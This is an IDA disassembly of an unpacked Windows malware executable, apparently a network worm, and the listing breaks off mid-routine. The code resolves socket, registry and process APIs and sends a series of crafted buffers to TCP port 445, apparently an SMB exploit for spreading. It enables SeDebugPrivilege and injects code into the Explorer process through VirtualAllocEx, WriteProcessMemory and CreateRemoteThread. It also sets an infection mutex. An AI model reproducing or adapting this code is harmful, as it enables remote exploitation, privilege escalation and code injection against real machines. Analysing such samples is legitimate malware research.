;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DC9E03A01AC2DDA5477F37F701F54C9E
; File Name : u:\work\dc9e03a01ac2dda5477f37f701f54c9e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31500000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31501000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31501000 dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31501004 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31501008 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_3150100C dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHash ; sub_31502889+FD�r
dword_31501010 dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31501014 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31501018 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_3150101C dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKeydword_31501020 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31501024 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31501028 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3150102C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_315023BF+1D�r
dword_31501030 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31501034 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_315023BF+4E�r ...
dword_31501038 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownA align 10h
dword_31501040 dd 7C830D74h, 7C80D262h; resolved to->KERNEL32.lstrcmpA ; sub_315036FD:loc_31503943�r ...
dword_31501048 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryA ; sub_315029A2+14B�r
dword_3150104C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_315035E3+ED�r
dword_31501050 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_3150334C+A�r
dword_31501054 dd 7C810B1Ch ; resolved to->KERNEL32.SystemTimeToFileTimedword_31501058 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3150105C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31501060 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31501064 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31501068 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_315029A2+3F�r ...
dword_3150106C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; UPX0:31503423�r ...
dword_31501070 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31501074 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31501078 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3150107C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31501080 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31501084 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31501088 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_3150269D+8F�r ...
dword_3150108C dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3150218B+58�r
dword_31501090 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_31502BC3+98�r
dword_31501094 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_31502BC3+C2�r
dword_31501098 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_315025D1+F�r
dword_3150109C dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_31502889:loc_3150295B�r ...
dword_315010A0 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_315011C0+272�r ...
dword_315010A4 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31501A62+E2�r ...
dword_315010A8 dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_315029A2+69�r ...
dword_315010AC dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_315010B0 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_315017AF+2C�r
dword_315010B4 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31501D89+D4�r
dword_315010B8 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_315010BC dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_31501911+19�r ...
dword_315010C0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3150246B+92�r
dword_315010C4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31501D0D�r
dword_315010C8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_315031C7+13�r ...
dword_315010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_315010D0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31501911+12�r ...
dword_315010D4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_315010D8 dd 7C80A017h ; resolved to->KERNEL32.SetEvent ; sub_31502B27+1B�r
dword_315010DC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_315010E0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31501B9B+66�r ...
dword_315010E4 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_315010E8 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_315010EC dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_315029A2+83�r ...
dword_315010F0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_315025D1+C3�r
align 8
dword_315010F8 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_315010FC dd 77C4CBE0h ; resolved to->MSVCRT.atandword_31501100 dd 77C4D444h ; resolved to->MSVCRT.sindword_31501104 dd 77C4CD34h ; resolved to->MSVCRT.cos; ---------------------------------------------------------------------------
loc_31501108: ; DATA XREF: sub_31503A78�r
cmp [edi], ah
retn 0FA77h ; DATA XREF: UPX0:loc_31503A72�r
; ---------------------------------------------------------------------------
db 27h, 0C2h, 77h
dword_31501110 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_315036FD+B9�r
dword_31501114 dd 77C46030h ; resolved to->MSVCRT.strcpydword_31501118 dd 77C46040h ; resolved to->MSVCRT.strcat; ---------------------------------------------------------------------------
loc_3150111C: ; DATA XREF: UPX0:loc_31503A60�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31501120 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3150246B+79�r ...
dword_31501124 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31501B9B:loc_31501C69�r ...
dword_31501128 dd 77C371BCh ; resolved to->MSVCRT.srand ; sub_3150334C+5D�r
dword_3150112C dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31501130 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31501134 dd 77C475F0h ; resolved to->MSVCRT.memset dd 0
dword_3150113C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31501A62+8B�r ...
dword_31501140 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31501144 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31501148 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId align 10h
dword_31501150 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlAdword_31501154 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_31501158 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_3150115C dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:315022E2�r
dd 0
dword_31501164 dd 71AB2DC0h ; resolved to->WS2_32.selectdword_31501168 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_3150116C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31501170 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_31501F46+7A�r ...
dword_31501174 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_31501F46+93�r ...
dword_31501178 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_31501F46+B5�r ...
dword_3150117C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31501180 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31501184 dd 71AB2BF4h ; resolved to->WS2_32.inet_addrdword_31501188 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_315019F3+25�r
dword_3150118C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31501B9B+AC�r ...
dword_31501190 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31502252+D�r
dword_31501194 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31501B9B+F0�r ...
dword_31501198 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_31502DC7+46�r
dword_3150119C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31501A62+67�r ...
dword_315011A0 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_315011C0+1D8�r ...
dword_315011A4 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31501A62+11B�r
dword_315011A8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31501A62+122�r ...
align 10h
dword_315011B0 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315011C0 proc near ; CODE XREF: sub_3150209F+36�p
; sub_31502103+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31503A30
mov eax, dword_315059CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_315059D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_3150118C ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31501720
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_31501190 ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_315010A8 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_315059C0
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31501233: ; CODE XREF: sub_315011C0+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31501233
push 60h
lea eax, [ebp+var_E4]
push offset dword_315054E0
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31503A1E ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31503A18 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31503A18 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31503A1E ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31503A12 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31503A12 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31501194 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31501198 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31501716
mov esi, dword_315010A4
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_3150119C
push 89h
push offset dword_315052C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A8h
push offset dword_31505354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0DEh
push offset dword_31505400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp eax, 46h
jl loc_3150170B
cmp [ebp+var_730], 31h
jnz loc_315015B6
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31503A12 ; memset
add esp, 0Ch
push offset byte_31505000
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31503A1E ; memcpy
mov eax, dword_31505906
add esp, 0Ch
mov [ebp+var_798], eax
loc_31501457: ; CODE XREF: sub_315011C0+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 68h
push offset dword_31505544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0A0h
push offset dword_315055B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
cmp [ebp+arg_0], 0
jz loc_315016A6
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31505768
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31503A1E ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_315057D4
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31503A1E ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31505848
push eax
call sub_31503A1E ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jz loc_3150170B
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_315016FE
; ---------------------------------------------------------------------------
loc_315015B6: ; CODE XREF: sub_315011C0+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31503A12 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31505940
push eax
call sub_31503A1E ; memcpy
push offset byte_31505000
call sub_31503A18 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_315059B8
push eax
call sub_31503A1E ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31505940
push eax
call sub_31503A1E ; memcpy
add esp, 40h
push offset byte_31505000
call sub_31503A18 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31505000
push eax
call sub_31503A1E ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31501652: ; CODE XREF: sub_315011C0+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31501652
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31503A12 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31503A12 ; memset
add esp, 18h
jmp loc_31501457
; ---------------------------------------------------------------------------
loc_315016A6: ; CODE XREF: sub_315011C0+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31505654
push eax
call sub_31503A1E ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31503A1E ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_315056D4
push eax
call sub_31503A1E ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_315016FE: ; CODE XREF: sub_315011C0+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_3150170B: ; CODE XREF: sub_315011C0+1AD�j
; sub_315011C0+1E1�j ...
push 2
push [ebp+var_4]
call dword_315011A4 ; shutdown
loc_31501716: ; CODE XREF: sub_315011C0+166�j
push [ebp+var_4]
call dword_315011A8 ; closesocket
pop esi
loc_31501720: ; CODE XREF: sub_315011C0+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_315011C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501727 proc near ; CODE XREF: UPX0:loc_31501D4D�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_315010B4 ; LoadLibraryA
mov esi, dword_315010B0
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_315017AB
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_315017AB
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_315017AB
lea eax, [ebp+var_C]
push eax
push 20h
call dword_315010AC ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_315017AB: ; CODE XREF: sub_31501727+28�j
; sub_31501727+37�j ...
pop edi
pop esi
leave
retn
sub_31501727 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315017AF proc near ; CODE XREF: UPX0:31501D61�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, ds:dword_31506180
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_315010C4 ; GetModuleHandleA
mov esi, dword_315010B0
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_315017F6
loc_315017F2: ; CODE XREF: sub_315017AF+54�j
push 1
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_315017F6: ; CODE XREF: sub_315017AF+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_315017F2
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31501144 ; FindWindowA
test eax, eax
jnz short loc_31501824
call dword_31501140 ; GetForegroundWindow
test eax, eax
jnz short loc_31501824
push 2
jmp short loc_31501847
; ---------------------------------------------------------------------------
loc_31501824: ; CODE XREF: sub_315017AF+65�j
; sub_315017AF+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31501148 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_315010C0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_3150184A
push 3
loc_31501847: ; CODE XREF: sub_315017AF+45�j
; sub_315017AF+73�j
pop eax
jmp short loc_315018B5
; ---------------------------------------------------------------------------
loc_3150184A: ; CODE XREF: sub_315017AF+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_315010BC
test eax, eax
jz short loc_315018A8
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_315010B8 ; WriteProcessMemory
push ds:dword_31506154
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31501894
push eax
call esi ; CloseHandle
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_31501894: ; CODE XREF: sub_315017AF+DE�j
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov [ebp+var_4], 5
jmp short loc_315018AF
; ---------------------------------------------------------------------------
loc_315018A8: ; CODE XREF: sub_315017AF+B2�j
mov [ebp+var_4], 4
loc_315018AF: ; CODE XREF: sub_315017AF+E3�j
; sub_315017AF+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_315018B5: ; CODE XREF: sub_315017AF+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_315017AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018BA proc near ; CODE XREF: sub_31501B9B+B�p
; UPX0:31501D23�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_315010C8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31501128 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_315018BA endp
; =============== S U B R O U T I N E =======================================
sub_315018E8 proc near ; CODE XREF: sub_315017AF+EA�p
; UPX0:31501D2D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_315010CC ; CreateMutexA
retn
sub_315018E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315018F7 proc near ; CODE XREF: sub_31501D89+12D�p
; sub_31501D89+138�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
pop ebp
retn
sub_315018F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501911 proc near ; CODE XREF: sub_31501B9B+12C�p
; sub_31501D89+113�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_315010D0 ; CreateThread
push eax
call dword_315010BC ; CloseHandle
pop ebp
retn
sub_31501911 endp
; =============== S U B R O U T I N E =======================================
sub_31501932 proc near ; CODE XREF: sub_31501F46+26�p
; sub_315025D1+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_3150195A
loc_31501943: ; CODE XREF: sub_31501932+26�j
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31501943
loc_3150195A: ; CODE XREF: sub_31501932+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31501932 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501962 proc near ; CODE XREF: sub_315029A2+16B�p
; sub_315035E3+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31503A12 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_315010D4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_315010BC
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31501962 endp
; =============== S U B R O U T I N E =======================================
sub_315019B8 proc near ; CODE XREF: sub_31502DC7+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31501184 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_315019D5
test esi, esi
jnz short loc_315019E7
cmp byte ptr [edi], 30h
jz short loc_315019EE
loc_315019D5: ; CODE XREF: sub_315019B8+12�j
push edi
call dword_31501188 ; gethostbyname
test eax, eax
jz short loc_315019E7
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_315019E7: ; CODE XREF: sub_315019B8+16�j
; sub_315019B8+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_315019EE
xor esi, esi
loc_315019EE: ; CODE XREF: sub_315019B8+1B�j
; sub_315019B8+32�j
mov eax, esi
pop edi
pop esi
retn
sub_315019B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_3150218B+3E�p
; sub_31502252+7�p
var_34 = byte ptr -34h
push ebp
